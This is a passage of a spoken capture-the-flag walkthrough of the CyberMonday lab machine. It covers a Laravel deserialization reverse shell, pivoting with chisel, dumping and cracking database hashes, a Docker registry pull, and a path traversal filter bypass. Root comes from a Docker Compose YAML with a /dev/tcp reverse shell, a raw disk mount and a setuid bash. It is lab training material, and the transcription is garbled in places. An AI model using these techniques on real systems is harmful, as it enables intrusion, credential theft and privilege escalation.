long time, which to me, that is good. Key star. We have ipsec9. That is key 3 though. We may have used that. But that looks good. So I think this is what we want to do. So now we have to set a Laravel session. So let's see, that was over here. And this is the Laravel session we want to set because that is the session of my browser we're thinking. So let's set this to be our payload. So if this works, we're going to set our Laravel session, and the data is going to be a malicious serialized object. And we're sending a shell to 9001. So let's make sure we are listening on 9001. And let's see. I guess now's a good time as any to send it. URL is not live. That's a good error. Let's refresh. We got an error. And we got data, but the shell exited, which probably means we mistyped our PHP gadget. Let's see. Yeah, we don't have the 0 and 1. So let's see, was that in 6? Zero and 1 like that. So now we have to do the annoying thing and replace. I can't write in this directory. Okay. So the first thing we want to do is replace backslashes. So we escape those. Then we'll replace quotes with an escaped quote. And then I will manually edit this. I think we did a double backslash on the single quote. So I think that is how we properly, quickly manipulate this payload. Then we can set the session. We will just highlight, replace. There we go. NCLVNP 9001. Refresh. And we have the shell, finally. So let's do Python 3, import pty spawn, bin bash. Python 3 not found. Do we have script? We do. The script -q. Let's see. Script -h. So you do quiet. I think we just do script -q dev null. Maybe type and bash. There we go. stty raw minus echo fg. So this is just another thing that's the same thing as the Python pty spawn. Okay. Export term is equal to xterm. Clear the screen. And we have a good TTY. Awesome. And sorry to jump back. I just remembered there was one thing I wanted to show. When I was looking at all this documentation, I was really trying to find other ways for Redis to talk back to me, like to try to send all the keys. I really don't think it's possible, but one thing that really was cool that I want to show is when we look at the documentation, we see the keyword is host and port that we want to send. And I didn't see a good way to search the documentation for like these arguments, but we can do a little bit of Google dorking, right? So if we went to site and put this URL, get rid of migrate. So we're only going to look for things that have this, and maybe it's in URL, not site. And then we can just say host, port, and double quotes. Go to Google, and this will show us all the commands. We have one omitted result, and that's because I think replica of was omitted, or slave of. Slave of. This was a deprecated function if we went here, and it was replaced by replica of, probably because of just the name, right? the whole like ID thing has moved away from that slave and master terminology. It's replaced with replica and this. But these are the commands that are able to have Redis make a connection to someone else, right? And the replica of would be a great thing, however, or failover. But both of these require editing the Redis config to put things in a cluster, so that wouldn't work, right? But this is just how like I would find one command and how I pivot using the information in that command to search documentation for everything else isn't useful here, but I'm sure if you take note of this, it will probably become useful for you when you try to pillage other documentation, right? So now with that being said, let's finally go and enumerate the shell we have on this Docker container. And I start with the same thing I would whenever I land on a web server, and that is pillage the database. So if I do a cat.env, this is the same file that we got with the Redis, not Redis, the Nginx off by slash thing at the beginning. But we can see the DB is called DB. It's on port 3306. We could also dump all the Redis keys with Redis CLI. So let's see, ping DB. We don't have that. We could probably curl it, right? Failed to connect to port 80, 3306. So we can access it. We probably don't have like any MySQL client. So we can either like upload tools to the box or just do a reverse proxy. And the reverse proxy is probably going to be the easier route. So let's make a directory www. I added an extra W there, but it doesn't matter. And copy chisel over to it, right? So up chisel here, Python 3, HTTP server. And then let's go to dev shm, wget it. We can curl it since wget's not there. And while that goes, let's chmod plus x chisel so we can execute it. We want to do server, then the flags. Let's see. I think it's like dash dash reverse dash dash socks 5. That's what I want to do. We have to specify the port. Let's do -p. Well, it's on 8001. Okay, we have the server up. Same thing here, chmod plus x chisel. Try to execute it. Permission denied. That's probably because dev shm is mounted with no exec. If I do this, we see shm, no exec. I don't see /temp in here, so we can just copy chisel to temp and then do the same chmod command. And we should be able to execute chisel. So now we can do client and then 10.10.14.8, 8001. And I think it is capital R socks, right? We see it connected back, and we have a socks 5 proxy open on port 1080. So if I cat etc proxy chains, we see socks 5 is configured. So that should mean I can do like proxy chains, MySQL. I know I have MySQL client, right? MySQL. It's just this, I think. So proxy chains that. I think it's dash capital H DB, lowercase h DB. It's doing a DNS request. Let's see, sudo v etc proxy chains. Let's see, is there a way to proxy DNS? We have it set. So, we have to figure out exactly what the database IP is. That's the wrong pane. Can control Z background. That probably still works. Got etc host. We're 172.18.06 probably. We are. Let's see, curl -v db. 172.18.04 is the database. 172.18.04. It's trying to connect to it. We may have to foreground this. Okay, denied for user IPsec. We can do root, and the password was root as well. And now show databases, use CyberMonday. Oh, we have the Webhooks-api-beta database as well. Show tables, select star from users, and we have the users we created, and then admin. So let's copy this. And v creds.text, we can say admin this. And I'll do admin underscore CyberMonday. Just for my notes, right? The username doesn't matter. It's my notes there. Because if I do show databases, we can say use webhooks underscore API, show tables, select star from users, and we also get admin's hash here. So we can try cracking this. So let's go admin underscore webhooks, paste this in, save it. And let's see, is there anything else we want to do? I think we wanted to look at the Redis CLI. So let's go back here. Let's see, curl, was it just Redis 6379-v? That is going to be 0.7, it looks like. Was that RIP? Hostname-I? Or 06? Okay, foreground the chisel. And we can do Redis CLI. How do we do host? Options, CMD, so -H. So -H, 172.18.0. What was it? 7? Okay. That is foregrounded. Put a proxy chains. And we can do key star. And we don't really have anything. This is, I think, our Laravel session. We could do get on this. And just see. That is, yeah, our Laravel session when we did that. We created all these keys, so there's no extra Redis keys. So at this point, we know of, I guess, 3 hosts. We have the web server, we have the database, we have the Redis. There's also a 4th host, the like webhook thing, but the Redis IP was on .7, and we have 4, 5 if you include the host. So there's 2 IPs we don't exactly know that are probably online in the Docker container. So before we enumerate those, I always like starting some work in the background. And now's a good time as ever to start cracking the 2 hashes we just got. I don't think it's going to be beneficial, but again, always want to put something going on in the background. So let's do v hashes CyberMonday, cat, the creds we got. I probably should have named that file hashes.txt. Oh well. Naming conventions is not something I am good at. So we can do /hashcat, then specify the hashes, opt word list rocku.txt. And we also want to specify the username flag because that's how we have it. And let's see if it auto detects anything. And while we're waiting on that, if you don't know what the Kraken is, it's just a separate box on my network, right? Because you should never really crack hashes on your main rig because it's going to make your computer go slow. Or at least if you do it on it, don't do it in a VM. The main reason I'm not using my computer to crack because I'm also recording, and that could lead to drop frames and things like that. So it looks like the hash matched a few things. This one is the most similar, I believe, so I'll manually specify that mode. And this will take a while because bcrypt is a very slow algorithm to crack. So we want to try to pivot and enumerate other things, right? So if I did a curl on 172.18.0, 7 was Redis, right? 8? Yeah. 7 was Redis. I'm looking for a way to get the host name, right? I was hoping like curl would show us. Is there like ns lookup? It's not on this box. Dig, not on this box. I I don't know a good way to show the host. I guess we could do like cat net proc net arp. Won't show us the host, but we can see the IPs. 8 resolves to a null MAC address because it doesn't exist. So we do know it goes up to that. We've talked to most of these hosts, but again, not giving us any host names. So let's see, we did curl, that didn't work. I'm not sure what else to try. So let us just do static nmap and do it the old fashioned way, right? We could nmap through the chisel proxy, but anyone that's ever tried nmapping through a proxy, it doesn't work that well. So always good to just grab the static binary and do it this way. I may even have this on my op directory, but just in case I don't, let's do it this way. Move, not that. What was the file name? Just nmap. Okay. chmod plus x nmap. Go back here. wget 10.10.4. We don't have wget. Curl 10.10.14.8 8000 nmap -o nmap. Start the web server. chmod plus x nmap. And then we can do 172.18. What's our IP? First name -I. Yeah. Nmap 172.18.0.0 / we'll do 24. Min rate, let's set it for 1000. /nmap. Let's see. Unable to find nmap services. Go to like scan method. There we go. I should also add like a -v and then let's say --open. So it'll show us things as it finds it. Maybe I should have only done host discovery. This is going a bit longer than I expected. Okay, well, never mind. So we have Nginx on 02, the registry on 03, DB 04, API 05, ourselves on 06, Redis on 07. The registry, I don't know exactly what that is. That's the one that stands out to me right now. And the fact it says registry and we're Docker, I'm guessing it's a Docker registry, right? So let us specify -b- to scan all ports. Let's see, can we do this? Do we have to do like a -pn? No. What are we missing? What is the actual error? Unable to find nmap services, resorting to Etsy services. I'm not sure exactly why it errors when I say like a full port scan. This error makes sense if we just want to do like the top ports, but we didn't. It didn't error when we did send because that ignores like all the port scanning afterwards. It's just host discovery. So let's see. We can either probably copy our nmap services from our box, or if we just do touch nmap services, hey, it works. So I'm going to add a min rate is equal to 10,000 because I want to go fast. I wouldn't recommend making that a habit because sometimes when you go fast, you kick things over. But at 10,000 packets per second, it should be finishing in probably another 5, 4, 3, 2, 1. Is it done? No, it is not. That $P_n flag is probably what's taking so long. I think that is disabling the use of ping. I've used that because I'm not running as root. So that's generally my first go-to when nmap's not working and I'm not able to run it with sudo, root, or the capability, I do the -P_n. And we see one port is open, and that is 5000. So if we do curl 172.18.03 on port 5000, do a -v, we can see something, but I guess the best thing to do would be to examine what that is on our box. So let's go and set our proxy up to use SOCKS 5. And if you want to see my Foxy proxy config, it's just saying SOCKS 5 1080, right? So now I should be able to do 172.18.03 port 5000. That's what we said, right? 18.03, 5000. That is indeed. Oh, we have to foreground. I should have just done 2 reverse shells, so I didn't have to keep doing this like foreground nonsense. But we don't really have anything, right? So let's see, the cracking is still going. I guess we could run chisel. Not chisel, GoBuster. And probably want to copy GoBuster over to the box. Because again, I'm gonna have to copy GoBuster and the word list probably. But doing GoBuster through the proxy could be slow, right? So that's why I'm going to copy them both. So we can cp opt seclist discovery web content raf small words dot text here. And let's do Python 3 HTTP server. And then curl 10.10.14.8 8000 GoBuster GoBuster. And then I want to just copy this file. Curl 10.10.14.8 8000. Okay. chmod plus x GoBuster. And we can say directory mode URL 172.18.03 word list is that. And we forgot to, oh man. Our terminal is all wacky. So let us do stty-a rows 28 columns 110. stty rows 28 cols 110. There we go. That fixed that issue. 5000. HTTP. And there we go. We have a v2 directory. So if I go into /v2, we have to foreground our chisel proxy. We just have blank JSON. We did a curl 172.18.03 5000 v2 -v. We can see it is a Docker distribution API. So this is a Docker registry, definitely. So I'm just going to foreground this, and then we will work with it just because I know Docker. If I didn't, I would be looking up, going to Google, and like saying what is a Docker registry and things like that, right? But let's just skip that whole part and curl the catalog. So we'll say curl HTTP 172.18.03 port 5000 v2 underscore catalog. And again, oh, I did do the foreground. I forgot to do a proxy chains here though. And we could also pipe that over to JQ. We'd probably have to do Q-S. I'm guessing because proxy chains is in verbose mode, so it shows that. Because JQ should have grabbed that, right? Let's see. Sudo v etc proxy chains. How can we turn that off? Random chain. We'll turn quiet mode on. We still get that. Huh. I don't know why JQ is not working there, but maybe we can just do echo this, JQ dot. There we go. So there is the CyberMonday _ API repository. Let's see, catalog, is there like a tags? Let's see. So that was the catalog. Let's see. Docker list images on a registry _ catalog. Let's turn our proxy off. There we go. I thought I knew this. V1 search. So we got catalog, Redis Ubuntu, this tags. So V2, then CyberMonday API. We need list. There we go. So that is a Docker image on this registry, CyberMonday API. So let's just do a Docker pull. So proxy chains, Docker pull. I think we can specify the registry. And then CyberMonday API. Let's see. Docker pull H. Let's see. What is the command to pull from a remote registry? Docker pull remote registry. I wonder if it was on this page and I just did not keep reading. I know we've done it before in a box. If you went to ipsec.rocks, I'm sure it would have it. Like that. Invalid format. There we go. So I think it is going to pull. It says it's using the tag latest. That looks to be fine. It's just going incredibly slow. Let's see. It's doing HTTPS. And we did HTTP, right? Since we couldn't specify HTTP and it takes a long time, I'm going to guess this is a proxy chains issue. Docker is coded in Golang. Golang generally doesn't like proxy chains. So we could either see if there is a socks command in Docker. Let's see, Docker socks pull. And not use proxy chains. Let's see, here it is. And they're doing a local port forward, which is the second thing I was going to say. Oh, no. Let's see. Oh, they configure the Docker service with a proxy. What if we just do HTTP proxy? Let's try this real quick. It may obey environment variables. Maybe not. We are listening on 1080. Let's see. I don't think that's going to work. I'm sure if we configured the service like they said it would, but we could also, let's see, run that chisel again. So if we do chisel client 10.10.14.8, 8001, let's listen on port 5000, direct it to 172.18.03 to 5000. Okay. And that did not work. Let's see. What is that syntax? Do we do R like that? Okay. So now grep 5000. Okay, so now Chisel's listening on 5,000 of my box. Anything I send to it will go through it and end up on that other side. So we can go back to this Docker poll, and instead of saying 172.18.03, we just say 127.0.0.1. And there we go. It is pulling. So again, the whole reason that doesn't work is proxy chain works by, I think, LD preload, which works on, doesn't work on statically compiled binaries, which Golang is. So proxy chains can't intercept the request for a network and can't just put the proxy on it, right? But if we just create a socket in our machine, avoid the proxy altogether, it just magically works. So now that we have this, we should be able to do a Docker run next and run the image. We could also probably just manually look through the image. I'm much better at just running the image than executing bash on it to go in it. There's a lot of ways we could do it, but I think if we just did Docker run like this with bash, Docker ps, Docker exec-it 9 -bab-sh. There we go. We're in this image. So this is going to be the source code to, oh no, this is the Redis. Whoops, that is not what I wanted. We probably have to say -it, maybe? I think that puts us in a interactive terminal. There we go. So now we're in the webhooks config, right? So if we went all the way back, the Webhooks API, this is the source code we're now looking at. So let's see. We can probably copy that outside of this. So make dir API, cd API, Docker. I'm just going to kill this hashcat. So we can do Docker cp 941 AD. And then we want to go var www HTML to our current directory. Can we specify recursive? Let's see, do we have tar? We do. Temp tar cjvf source tar bz2 var www HTML. There's probably a better way to copy that. Dev source tar bz2. No container path. Temp. There we go. Oh. Why do I have... One of those things worked. I could have swore I did ls HTML and it did not work. Maybe I CD'd HTML and thought I was doing ls. Okay, we have the source. So if we cat config.php, db host, db name, db user, db pass. Is it like a .env file? Let's see. There does not appear to be. So let's see. I guess we can remove this for www HTML. There is not. So how I'm guessing is when they run the Docker on the server, they pass in the environment variable, which is a good way to do it. So anything in keys, this is probably the key to sign that JWT, which we use the algorithm confusion attack, so did not need to do that. I'm just going to open this up in Visual Studio Code, and we can take a look at the source code. So let's wait for Sneak to finish. So this will help us identify if there's any low-hanging fruit vulnerabilities in this code. And now that Sneak is done, we have a few open source security vulnerabilities. It looks like the JWT package has an issue, as well as the PHP seclib. So if this was production, we definitely need to update those. The thing I'm mainly curious in is, I wonder what the code quality is. Oh, not sure exactly what that's saying. Is never executed because it appears after return. 129. Oh, we got a return here and then a second return. So this function or this piece of the code would never return. So it's just highlighting that out. It kind of was hidden because I was focused on this return, not the one up here. So that's a pretty cool finding, I guess. But let's go look at the code security ones. So use of broken or risky crypto, it's calling out using ECB. These I normally skip over crypto findings first because they're generally hard to exploit. So we got a log controller one, and this is path traversal. So let's take a look at this function that's highlighting. This is the webhook action for logs, and the list was saying we can do path traversal here as well as read, because eventually it does a file get contents, and Sneak did not like this, which looks like it is the filtering in place. So let's step through this. The first thing it's going to do is look for anything with 2 periods, and if it does, it's going to say this log does not exist. So we can't do 2 periods. Then the next line is going to replace every space with nothing. So what this means is if our log was slash dot dot space slash or slash dot like that, if we had any semblance of a space in between these dot dots, then it would remove that space and we'd get back to this. And that's after this check is finished. So we bypass that filter, right? This replace probably should be at the top. But because it's not at the top, then we can make this replace create a directory traversal. So that's why we'll put spaces in the future. Looking at this, we have it checking to make sure log is in the name, and then making sure the file exists. So this looks relatively straightforward to exploit. We have to get to a hook that has the log method, right? I think we just did a get on webhooks. Let's see. That is a post. I said a get. Let's just change request method. There we go. So this is create log file. We want to execute read. How do I do that? Is there like a read log file? Actions list read. Let's see. Webhook find action. This data action. See, where do we create one? Ah, my burp froze. Okay. So this is where we can create, right? If we send this request, post not found. Why did that not work? Let's see. To create a webhook, we send a request to webhooks create. Okay. So let's go here. And we really got to name our tabs. So this will be called create. Webhook already exists, so we'll call this read. And our action, can we just do read here? Let's see. So I guess we want to do the create log file. We have this webhook. Say we want to do log name. And let's do var log messages. Log content stuff. So we can create. Wonder if we'd specify actions. Let's see. Actions read. That's not it. What is this code telling me? Let's go back to the routes. And oh, we have webhooks UID /logs. So let's add a /logs here. And we get unauthorized. Aren't we admin? Let's see, JSON web token. We're still admin. Let's go back here. Let's see. We do API key auth. So it looks like there may be a hard-coded API key. Let's see. Put that there. Let's see, how does this work? X API key. So we can leave an access token, and there's an X API key. There we go. So action not defined. And let's see. So now I think, or where we think we are. So we're at read. How do we get log name? So log path, webhook find name. This data log name. So I think log name is it. Can we do like var log messages here? Action is not defined. It is. Messages. What did I just have? Oh, it's probably because that's invalid JSON. There we go. So we ended the JSON with a comma. So that was the issue. Var log messages does not exist. What is in var log? Maybe syslog? Does that work? Do we have a shell here? ls var log. Maybe var log dpackage.log maybe. So let's just try that. Log doesn't exist. Okay, well, let's try the directory traversal. So what's probably happening is, oh, our log path is here. So we're not going in var logs. So what we want to do is make sure this log path goes with a bunch of .. slashes, right? So we'll do .. space / a few of those. And we have to add the space because remember, later on, we filter for /.. and later on we remove spaces. So we have that. Now does it work? It does. So now we can read files. Let's do proc self environ. Oh, we need log to exist, right? So we can just do log and then go up a directory. Log doesn't exist. Let's see. CMD line. Let's see. Proc_self CMD line definitely should exist. Let's see. I think we're triggering on this one. And maybe I don't understand what stripos does. Find the position of the first occurrence of a case-insensitive substring in a string. So that is just checking for the string. I'm just looking back to where I can read a log file. Okay, so now that we can read a log, let's see, can we do a like that? We can. There we go. I'm not sure what was going on before. If I get rid of var log. Okay, so I know what happened. If you specify a directory in the traversal that doesn't exist, like I was thinking this, it would just like be smart enough to go up, up, hit log, go back down, right? Or up, I should say. But it's not. It tries to traverse, it says log doesn't exist and fails here. So when I put a var log, it doesn't fail because this directory does exist, right? So it goes up all the directories, hits var log, okay, then we go back up so we can hit proc self and viron. And the whole reason I want to do that is so we can look at the environment variables. So let's copy this, and then we can go back to our terminal, echo-n, jq dot. I wonder if we do a raw. I wish that would print a bit better. Let's see. I wonder, let's see, we can do dot message raw. And it looks like we can separate that with the line break. Does that work? That is just worse. Let's copy this. Vim. Okay. So host name, let's just do it the old-fashioned way. Until we see things that stick out. There's got to be a better way to do this. So one thing that sticks out right now is we have a different database password. And that database password is this, right? On the other web server, we just use root for the database password, but this is using a weird string. We don't have any username other than admin. We could try, let's see, SSH admin at 10.10.11.228. Copying this over here. And we get password denied. I don't think I saw anything in the database that had other names, and the sessions isn't pointing me away in Redis. So one thing we could potentially do, if I can remember which terminal it was, is start looking at this container again. In the .env file, it did say something about the changelog was in mount. We can just show that again. That's here. Changelog path mount changelog.txt. So if we look at mount, we do have the changelog, and that's where the user flag is as well. So don't see any names here. If we do ls logs, oh, this is where we could write the file, right? This is what we had been doing with the hook. One of these is going to be like stuff or something, right? Remember the webhook to create files? We finally figured out how it works. But there was a SSH directory. If we go in that, it's just authorized keys, but it does leak the username John. So if we do ssh john at admin, or ssh john at the CyberMonday host, and then grab the database password, try it, and we get logged in as John. And we can see this is probably the /mount directory because we have changelog logs and user.txt, right? That's the same thing we saw in mount in that Docker container. The first thing I do whenever looking for privesks is just do a sudo -l, and we can see John may run this secure compose Python file as root. So let's take a look at this. Let's do v, I guess. I wish I had syntax highlighting. Let's just cat it. Oh, shoot. Go in copy mode. Grab this. There's a lot of stuff to go over. I am not looking forward to that. Okay. V secure compose.py. Paste. There we go. So let's just look at main. So we give it a YAML file. And Docker Compose is just a way to build Docker services. So it's going to create the directory. It's going to run Docker Compose up build on it. So let's see. Create random, copy, chdir. I'm guessing each of these functions is going to be some type of sanity check on the YAML file. So get user, not really that interesting, is path inside whitelist. So we want to look at exactly where this function is. And it looks like it is used in this check whitelist. So these two things are tied, and check whitelist is going to look at the volumes and make sure the volumes is part of the whitelist. So is path inside, it looks like what this is doing is just allowing us to have a volume that's specified at /home and our username. So that's why, let's see, that mount is here, right, at /home John. What that's preventing us to do is, like, say the volume is just /. If the volume is just /, then we can access the root OS, right? It's trying to jail us into only allowing the partition to be in the home directory. It's also got a check to read only. So that's going to say it's going to allow /mount to only be read only. And that's trying to prevent us from, like, if we had root on the Docker container to drop a set UID binary, then execute it on the host operating system. There is probably a way around this because we can just mount it read only. And then once we're in the Docker container, if we're root, we can remount it to be read write. As long as we have the capability, right? Check no privilege, no symlinks, and main. So there's a few things we could do. We can either, like, do a capability, insert a kernel module, and work that way, which we've done in another video. I forget what it is, but I'm sure like, let's see, ipsec.rocks, Docker kern, no, module, uploading a malicious drop. Nope. Let's see, kernel module, probably monitors, inserting the kernel module and getting root on the box. It's probably one of these. It sounds like we did that in monitors. So I'm not going to do that again. Instead, let's try going a few different ways, right? So the first one, the obvious one, it's only checking volumes. And if we went to the Docker compose file documentation, let's see if this gets me there right away. Overview. Is this it? It is. So they'd have a lot of checking around the volumes, but there is devices. So instead of passing the volume, we could probably just pass dev SDA1 in, or whatever the raw device is. So let's try that. The first thing to do is we have to create a sample Docker file. Does this give a good sample? Let's go to the top of the page. Kind of. Let's just copy this. Let's do sudo-l again. Okay, we can specify any YAML. So we'll do malicious.yaml. Paste that in. And then we can declare what we want to do. So we can leave the service. So web app. And then we want to give it the image this container is, and this is the image that was on the registry that we had downloaded, right? We know this image exists on the box. So we'll do it. In most things, historically, we've always used Alpine because that's a small image that's generally on the box. But in this case, we know CyberMonday_API was in the Docker registry. So the next thing to do would be we can set the command we want to be ran when it builds. So we can do bash-c, then bash, I can type, bash-i, dev tcp 10.10.14.8, 9001, 0, and 1, like that. Okay. And then we can pass in the device. So if we do devices, and then dev SDA1, dev SDA1. We can make sure the device exists, which it does. We have to run the sudo password again. Let's see. Let's grab this. Paste. There we go. So now, when we run this, we should be able to get a shell to the box, and that container will be mounted. We don't. Is it as simple as we have an old version of Docker? I'm just going to remove the .8. There we go. That was it. So if we do ls dev, we can see SDA1 is here. You generally don't want to mount the same disk twice, because if you do, bad things will happen, right? So probably the best thing to do here would be if we have debug fs, which we probably do, it's on a lot of things, we do, to use that. So let's export term is equal to xterm script-q dev shm script-q dev null raw minus echo foreground export term xterm. There we go. What? Why can't we not clear the screen? Reset. Let's try that again. Shoot. Reset. NC LVNP 9001. Uh-oh. I don't like read-only file system. Did we screw something up? I think we hosed the box. I don't know what we did, but we did something that was not good. Uh-oh. I may have to revert. What the heck did I run? I just did like a witch debug FS. I didn't even touch the file system. Well, that's not great, but I'm going to copy this. We're going to revert the box and try it again. So, yep, gonna pause the video and revert. Okay, the box has been reverted, so let's try this again. And if it doesn't work, we'll move to the other way we could do it. We're gonna do both ways anyways, but I did not think this would be that dangerous. And this goes to show, even though you think something may be safe, when you do things in production on pen testing, things can go very bad very, very quickly. I'm just thankful this happened in a lab environment and not production. I forgot to stand that up. There we go. So what we did was a script -q, say, don't bother logging things. STTY raw minus echo foreground. Export term is equal to xterm. If I was in bash, I could clear the screen. Okay, that was it. So now we have a proper terminal. We have dev SDA1. You don't want to mount dev SDA1 twice because bad things happen, as we kind of saw. But there is debug fs, so we can do this. We spell debug fs correctly. And we want to probably do our STTY again. 28 rows, columns 110. STTY rows 28, columns 110. That may make this output better. Not really. We can see all the directories, so we could go cd/root, ls, and we can cat root.txt and get the flag there. There wasn't a .ssh directory. We can probably make dir.ssh. File system open read only. Q to quit. We can do a -w to open this and write, and bad things are probably going to happen, but let's just do it live. We want to get a SSH key on this box. Let's see. SSH keygen -f CyberMonday cat cybermonday.pub. Grab this. V key.pub. Echo this to authorize keys. Okay, we have the file on a disk. So let's go back to debug fs, open this in write mode, and pray we don't kill the box. Let's go cd/root. sh is not there. We can make dir.ssh, go in it, and then we can say write the contents of /authorize keys to authorize keys. So it created that node. And we have that key on the box. The issue probably is going to be permissions. sh-i CyberMonday root at 10.10.11.228. Yeah. So we do ls cd root ssh ls. Oh, it does not exist. Maybe we want to do the full path. File already exists. Q, go back in it. Bad things just happened, I think. So that's probably not how you write a file. And let's see, is the file system forked? It is not. Dare we try this again? Let's see, debug, fs, dev. Oh, we probably want to fix our terminal. Script q dev null st2i raw echo foreground bash export term xterm. Okay. Debug fs w dev sda1. We're back in business. Cd root ssh. We do have an authorized key file. Our key is there. Can't use it. I'm going to guess it is permission related. Let's see. Is there a chmod? I don't know how to change permissions. Let's see. Debug fs change permission of file. If this doesn't work, we're just going to move to the next way, right? Because we've proven we could get root.txt. We could probably write a file if we tried hard enough, but this is not working well. Trying to use mi. That does not seem to work. Is there LA? Authorized key 644. I don't know what MI is. 0100600. UID 0, group ID 0, size, that's fine. We're setting all the stuff on this file. I don't know what I'm doing, but it now looks like it's modded 600. So try it again. Still can't. AUTHORIZED keys. So there may be something preventing root from executing this. I guess we could write bin bash to temp bash. And then mi temp bash. And we want to change this mode to be set UID. So what would be a set UID permission? Let's see. Let's just do mi on user bin ping, because ping is generally set UID 01755. That's not good. Let's just double check our thought that ping was set UID before we move on. Let's see. Access. It is not. Find dash perm minus 4755 dev null. Isn't that it? Linux list set UID binaries. Dash perm minus 4000. Helps if we don't mute all our errors. So this should show us a set UID binary. Let's just look at user bin su. 01. So I don't know what the 010 is, but 4755, we could have guessed that. So let's do the dangerous thing and try setting bash. So mi temp bash, set the new mode, and hit enter a bunch. Then we can quit. We do temp. There is a bash. It is set UID temp bash dash p. And wrong version of bash. I'm guessing it ran the bash that was in the Docker container, not the one that was on the system, which is annoying. So let's see. Python 3m. Let's cp bin bash to dev shm. Let's copy this bash. Curl 172.18.01 bash -o bash. Okay, let's move bash to slash, and we're going to try this again. So we can write slash bash to temp bash2. If we go to temp, there is a bash2. So now we can do mi temp bash2, set the mode, and hit enter for all these. There's probably a way to just say accept defaults. Cannot access bash2. Bad message. Okay, once we exited the debug fs, that went away, and we are now successfully root. Something odd is on that SSH directory. I don't know what it is, but that's why the authorized key did not work. That make dir command was not safe to run, apparently. If we do stat.ssh, I have no idea. Ch own root ssh. That thing is clobbered. So that's why we couldn't add the key. Apparently, make dir was the wrong command to run, but that is one way we could root this, right? Let's do another way. We're definitely feeling bold right now to do 2 roots. But let's go back to John, the malicious YAML, and let's see. We wanted to do the mount. And remember, we have to specify the mount to be home John, and it also has to be read only. Those were the two key things in the file. So let's specify. Oh, shoot. Is there disk read only again? That did not look good. Touch T. Hey, we went to read only. So I'll revert the box and then we'll do it again. And hopefully the second way is a safer way. So what we learned here, never use debugfs to touch the file system. It's a bad idea. So reverting the box, we'll be back in a minute. Okay, so I have rebooted the machine and just kind of restored it to how we would expect it. We're doing everything with the devices directive. We can do volumes, and then we have to specify someone that begins with home. So we can do home John, and we can mount to /mount, and we can also make this read only. And we can't do read write because the secure compose thing requires read only on this mount. So the other thing we're going to have to do is give us all the capabilities, because by default, a regular Docker won't be able to change it. I forget exactly what capability we need, but I mean, when in doubt, give it all, right? So let's do a, do I have the password here? I do. Let me just echo it so it's somewhere. I should probably put that in like the creds file. So we can do sudo -l, put the password in, sudo opt secure compose, malicious YAML. Let's not forget a reverse shell. Run this. And we have it. If we go to /mount, we have the home directory of John. Now it is read only. If we try to touch it, we can't. It says read only. We can do mount -o, remount rw /mount. And we still have something. It says it is write protected. And this could be an AppArmor thing. It probably most likely is. So I'm going to exit this. And we can also tell Docker to add the AppArmor policy. And I don't have a good way to troubleshoot exactly how you would know this, other than if you've played with like Docker in the past and tried to do things. It's probably on the documentation page as well. I think the volumes of the devices is an easier way to do it. Also, if you do the capabilities and try to insert a kernel module, you'll probably run into this issue as well. But we can just do AppArmor unconfined to add that policy. And then when we run this again, it is started. Let's do a mount -o, remount rw on /mount, and it suddenly works, right? So now if we go in John's directory, we can just copy bash there. So I'm going to cp bin bash to my home directory. So if I do ls, we see bash is there. We can chmod 4755, or probably chown root to bash. So if I do a ls-la, we can see bash is owned by John, chown, it's now owned by root, chmod 4755 on bash. We look at this, and it suddenly set UID, and we can execute it. We can't do the root directory and add an SSH key, again, because the secure compose had that check-in, right? It wanted, when we did a mount, to make sure there was a home. And then it used get user to get the who was mounting it, right? So we can't do like any directory traverse of specifying home .. / whatever, because it's this environment variable. So if for some reason we could poison sudo _user, then we could make that username .. / root. So it would be whitelist home .. / root, and it would work. But there's no way for us to poison that environment variable to my knowledge. So that's why it doesn't work. But that is going to be the box. Hope you guys enjoyed it. Take care, and I will see you all next time.